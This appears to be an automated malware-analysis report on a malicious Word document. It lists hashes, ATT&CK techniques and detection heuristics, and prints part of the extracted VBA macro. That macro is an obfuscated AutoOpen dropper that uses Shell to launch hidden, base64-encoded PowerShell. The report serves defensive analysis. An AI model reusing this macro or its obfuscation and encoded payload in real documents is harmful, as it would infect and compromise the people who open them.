Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 176ba761ef11ff26…

MALICIOUS

Office (OLE)

93.5 KB Created: 2018-05-29 19:25:00 Authoring application: Microsoft Office Word First seen: 2019-05-31
MD5: 7783e2ffa96e23344526a6f2d3a303c6 SHA-1: 142d09e809eb23ff82fbe2d132552c025a7d40a1 SHA-256: 176ba761ef11ff26fe967027ebc373f90d9ad8eddfd5cd2d9066754b6619d843
242 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File T1566.001 Spearphishing Attachment

The sample contains a VBA macro with an AutoOpen function that calls the Shell() function. This indicates the macro is designed to execute arbitrary commands, likely to download and run a secondary payload. The ClamAV detection 'Doc.Dropper.Agent-6565439-0' further supports this dropper-like behavior. The macro's obfuscated nature and the use of Shell() suggest a high likelihood of malicious intent.

Heuristics 7

  • ClamAV: Doc.Dropper.Agent-6565439-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6565439-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 15357 bytes
SHA-256: 397ad3c4ef30df78487d5e041cb1f37b8d82523720343edfa3ae4288e395fb5d
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "RsjhYVLXtZaq"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function zYqwqlnlER()
On Error Resume Next
tsICjt = Atn(4887 * CInt(79950) + 15653 - 31196)
wWXLoi = 65112 + _
Log(4756) - ntQRRX / Atn(60920) / FcZdMa / dckub
wYJREr = Atn(6900 * CInt(83596) + 17903 - 92665)
DLHAcr = 71285 + _
Log(23995) - UjfqV / Atn(69638) / IiMzna / qUGAN
zYqwqlnlER = Qfrikpun + saQORdR + JHjpG + rQHDH + QzozPvsa + UXLWUWROpzu + XXWPFoX + zdaGfKr
cqwjva = Atn(2833 * CInt(36751) + 28310 - 2088)
zhOZMt = 36055 + _
Log(92014) - vvJzw / Atn(80173) / HQjVrX / linzvv
End Function
Sub Autoopen()
On Error Resume Next
ctjbzF = Atn(24521 * CInt(58258) + 57744 - 51590)
Eskjjz = 64296 + _
Log(11994) - tCiftb / Atn(2762) / uZtXAl / BcWBj
uriNi (zYqwqlnlER)
dmFhn = Atn(59802 * CInt(91090) + 8826 - 95946)
RowpaL = 2326 + _
Log(65002) - EkjEj / Atn(31484) / HSfEd / WjPPcw
End Sub
Function uriNi(SOYKDLl)
On Error Resume Next
wGXwl = Atn(53902 * CInt(67189) + 3890 - 93032)
pboffj = 87842 + _
Log(65832) - QjXcY / Atn(87876) / lSSZK / CbYwMn
VLjLwEZHB = HzZDENtw + Chr(vbKeyP) + IYjSbjaTQ
EhBKa = Atn(80292 * CInt(55488) + 78685 - 542)
AWhEhX = 48102 + _
Log(55917) - CaqQjX / Atn(64169) / YMGjT / OTjhM
CotsB = rNmvLqLNv + Shell(Gmhwl + VLjLwEZHB + GIMIlsIbXlJ + SOYKDLl + wnOFX, vbHide)
jQWlb = Atn(34426 * CInt(5499) + 56620 - 58678)
EzVNk = 86830 + _
Log(28248) - RnsiE / Atn(53958) / KjQSkw / MaPlDE
End Function



Attribute VB_Name = "RUDcDIHLGVVFS"
Function Qfrikpun()
On Error Resume Next
TLUAfB = Atn(37568 * CInt(81710) + 44540 - 30038)
EHrbv = 13714 + _
Log(36785) - Vbmhip / Atn(19166) / YENQV / UiqYU
SHAEATJzM = "owersH" + "eLL -Win" + "DowsTyle hidde" + "n -e KAAo" + "ACgAI" + "gB7ADk" + "ANQB9AHsANAAyA" + "H0AewAyAH0A" + "ewA0ADY"
wdivQo = Atn(5934 * CInt(60394) + 20943 - 84101)
ijTTX = 62522 + _
Log(56539) - LVsulK / Atn(97479) / rmNlX / srswqR
tBdljJSNUc = "AfQB7AD" + "AAfQB" + "7ADMANAB9" + "AHsAOA" + "AxAH0" + "AewA0ADg" + "AfQB7ADQ" + "AMwB9AHsAMgA"
mizjlf = Atn(69163 * CInt(3110) + 88034 - 94821)
MmJFDi = 86468 + _
Log(72577) - lLtzG / Atn(91505) / ocaapM / YqvOzf
CEhCi = "yAH0AewAyADAA" + "fQB7ADQAOQB9AH" + "sANgA2AH0Aew" + "AxADkAfQB7ADIA" + "OQB9A" + "HsANAA0AH0Aew" + "A4ADIAfQB7ADEA" + "MAAwA" + "H0AewA3ADg"
CzoPY = Atn(69606 * CInt(54426) + 76070 - 76066)
DFzIb = 71809 + _
Log(1049) - qjvZTW / Atn(15583) / ulOIU / GDiNEh
oHziOkspjK = "AfQB7ADEAfQB" + "7ADkAMAB9AH" + "sANgAyAH0AewAz" + "ADUAfQB7ADMA" + "NgB9AHsANAAw" + "AH0AewA2" + "ADUAfQ" + "B7ADcANAB9AH"
LTAoQX = Atn(70146 * CInt(25378) + 68494 - 94285)
unJvS = 55319 + _
Log(59127) - HXpqZ / Atn(58845) / KwvZNj / riPvk
ljMJHOZTKqQ = "sANwAxAH0Ae" + "wA3ADUAfQB7AD" + "gAOAB9AHsAM" + "QAwADIAfQB7A" + "DYANw" + "B9AHsAMQAw" + "AH0AewA3ADkAf" + "QB7ADU"
zXnLo = Atn(17664 * CInt(27832) + 61799 - 68338)
kGila = 21474 + _
Log(42389) - bKaMmR / Atn(19587) / YbwijX / cTkjiC
PbuiCEGFujG = "AMwB9AHsANQAx" + "AH0AewAxADQAfQB" + "7ADYAM" + "wB9AHsAMQAzAH" + "0AewA4ADYAfQB7A" + "DQAfQB7ADIANAB9" + "AHsANwA2AH0AewA" + "4AH0AewA5A" + "DcAfQB" + "7ADEAMA"
QKbnL = Atn(36935 * CInt(59064) + 90718 - 86234)
ImTacm = 72248 + _
Log(42291) - FkmjE / Atn(59484) / OGSqb / aLtQlw
XlRIOCRU = "AxAH0" + "AewA3AH0AewAzAD" + "AAfQB7ADkAM" + "gB9AH" + "sANQAyAH0Ae" + "wA5ADYAfQB7ADMA"
Qfrikpun = SHAEATJzM + tBdljJSNUc + CEhCi + oHziOkspjK + ljMJHOZTKqQ + PbuiCEGFujG + XlRIOCRU
End Function
Function saQORdR()
On Error Resume Next
qEdiP = Atn(41517 * CInt(86826) + 8721 - 33198)
jwNdwf = 56299 + _
Log(50185) - IwEXc / Atn(5456) / RMHjL / mPKAH
cNojjhsfpf = "MgB9AHsAO" + "AAzAH0AewA2" + "ADkAfQB7AD" + "UAOQB9A" + "HsAMwA4AH0Ae" + "wAzADEAfQB7" + "ADkAOAB9AH" + "sANgA4AH0AewA"
UjlHw = Atn(13052 * CInt(72519) + 83763 - 26047)
djQqP = 80930 + _
Log(14623) - jAfKEh / Atn(94001) / ofLwTw / ZFmWq
zvZYHlAfvG = "xADgAfQ" + "B7ADMAfQB7" +
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.